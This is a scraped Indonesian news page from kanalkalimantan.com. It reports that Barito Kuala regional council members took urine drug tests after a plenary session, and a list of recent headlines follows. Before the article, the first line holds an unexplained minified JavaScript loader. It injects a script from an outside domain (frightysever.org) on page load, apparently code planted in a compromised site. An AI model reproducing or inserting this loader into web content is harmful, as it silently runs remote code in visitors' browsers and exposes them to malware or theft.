(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
ADV DPRD BATOLA

Tes Urine Anggota DPRD Barito Kuala Pasca-Rapat Paripurna: Upaya Bersama Cegah Narkotika


KANALKALIMANTAN.COM, MARABAHAN – Sebagai langkah proaktif dalam menanggulangi ancaman narkotika di lingkungan pemerintahan, seluruh anggota Dewan Perwakilan Rakyat Daerah (DPRD) Barito Kuala menjalani tes urine setelah mengikuti rapat paripurna.

Ketua DPRD Batola, Saleh, mengungkapkan bahwa rapat tersebut fokus membahas Raperda Badan Usaha Milik Desa (BUMdes) dan Raperda Kepalangmerahan. Dalam upayanya meningkatkan kesadaran terhadap bahaya narkotika, Saleh menyebutkan bahwa pihaknya menerima instruksi dari Badan Narkotika Nasional Kabupaten (BNNK) Batola untuk menjalankan tes urine bagi seluruh anggota dewan.

Ia menekankan inisiatif ini adalah bagian dari komitmen bersama untuk menciptakan lingkungan yang bebas dari pengaruh buruk narkotika.

“Inisiatif BNNK Batola dan dukungan penuh pemerintah Batola dalam penyelenggaraan tes urine adalah bentuk konkret langkah kita melawan ancaman serius narkotika di tengah masyarakat,” kata Saleh.

Saleh juga menyampaikan keprihatinannya terhadap dampak destruktif narkotika dalam masyarakat dan menyebutkan bahwa melibatkan seluruh anggota DPRD dalam tes urine adalah bentuk tanggung jawab kolektif. “Kita perlu berkomitmen untuk menjaga kebersihan dan ketertiban di lingkungan ini, dan langkah ini merupakan langkah proaktif kita dalam mencapai tujuan tersebut,” tambahnya.

Dengan menghadirkan tes urine sebagai bagian dari rutinitas pascaparipurna, diharapkan tindakan ini bukan hanya sekadar bentuk pencegahan, tetapi juga menjadi contoh nyata kepedulian dan kesungguhan dalam menjaga integritas dan keamanan lingkungan kerja.(www.kanalkalimantan.com/rls)

Reporter : rls
Editor : kk


Muhammad Andi

Recent Posts

Mantan Bupati HSU H Abdul Wahid Tutup Usia

KANALKALIMANTAN.COM, AMUNTAI - Kabar duka datang dari Kabupaten Hulu Sungai Utara (HSU), mantan Bupati HSU… Read More

2 jam ago

Sekda Banjar Buka Sosialisasi Pelaksanaan Survei Kepuasan Masyarakat (SKM) 2024

KANALKALIMANTAN.COM, MARTAPURA - Sekretaris Daerah (Sekda) Banjar HM Hilman membuka Sosialisasi Pelaksanaan Survei Kepuasan Masyarakat… Read More

11 jam ago

Budi Doremi Bakal Tampil di Peluncuran Pilwali Banjarmasin 2024

KANALKALIMANTAN.COM, BANJARMASIN - Penyanyi Budi Syahbudin Syukur alias Budi Doremi bakal menghibur warga Kota Banjarmasin.… Read More

14 jam ago

Disdik Banjarbaru Catat 1.500 Anak Tidak Sekolah

Kadisdik Banjarbaru: PKBM Jadi Solusi Anak Mendapatkan Hak Pendidikan Read More

14 jam ago

Tanam Padi Apung di Desa Banyu Hirang Menuai Panen

KANALKALIMANTAN.COM, AMUNTAI - Mengoptimalkan lahan rawa, penggunaan inovasi tanam padi dengan metode apung oleh Kelompok… Read More

17 jam ago

Presiden Jokowi Memulai Groundbreaking PLN Hub di Jantung IKN

Pusat Ekosistem Transisi Energi dan Layanan Digital Pertama Terbesar di Tanah Air Read More

17 jam ago

This website uses cookies.